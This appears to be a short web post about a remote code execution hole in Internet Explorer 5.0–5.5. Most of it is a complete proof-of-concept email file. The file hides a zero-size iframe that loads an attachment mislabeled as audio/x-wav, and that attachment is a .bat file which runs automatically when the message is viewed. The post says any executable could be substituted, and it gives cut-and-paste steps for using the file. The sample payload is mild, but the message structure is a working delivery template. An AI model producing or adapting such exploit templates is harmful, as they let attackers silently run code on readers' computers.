Internet Explorer has a very serious security hole that can be exploited. This hole allows a web-page to take control of a user's computer. For the exploit to be successful, you must be using Internet Explorer 5.0 through 5.5 and, for this particular exmample, Windows Media Player 6.0. If you upgrade to Windows Media Player 7.0, the following example will not work. The exploit uses IFRAMES and multipart-related MIME entities, along with certain content-types that IE doesn't quite know how to handle. The following example is based on the fact that IE does not know how to correctly handle the audio/x-wav content-type. A person could attach an executable file, or a .bat file like I have included, and it will run automatically.

Source code to example of IE 5.0-5.5 exploit:
(just cut-n-paste the source code into a file called anything.eml and view it in Outlook Express or Internet Explorer)


To: victim
From: flood
Subject: bad mail
Date: Thu, 4 Apr 2001 13:27:33 +1000
MIME-Version: 1.0
Content-Type: multipart/related;
	boundary="egg"
	
This is a syntactically correct MIME message.
But it is semantically evil...

--egg
Content-Type: multipart/alternative;
	boundary="deadfrog"

--deadfrog
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:ATTACHED-CONTENT-ID-1 
height=3D0 width=3D0></iframe>
Whistles innocently...<BR>
</BODY>
</HTML>

--deadfrog--

--egg
Content-Type: audio/x-wav;
	name="hello.bat"
Content-Transfer-Encoding: quoted-printable
Content-ID: <ATTACHED-CONTENT-ID-1>

echo OFF
dir C:\
ping www.yahoo.com
debug
pause

--egg--

Log in or register to write something here or to contact authors.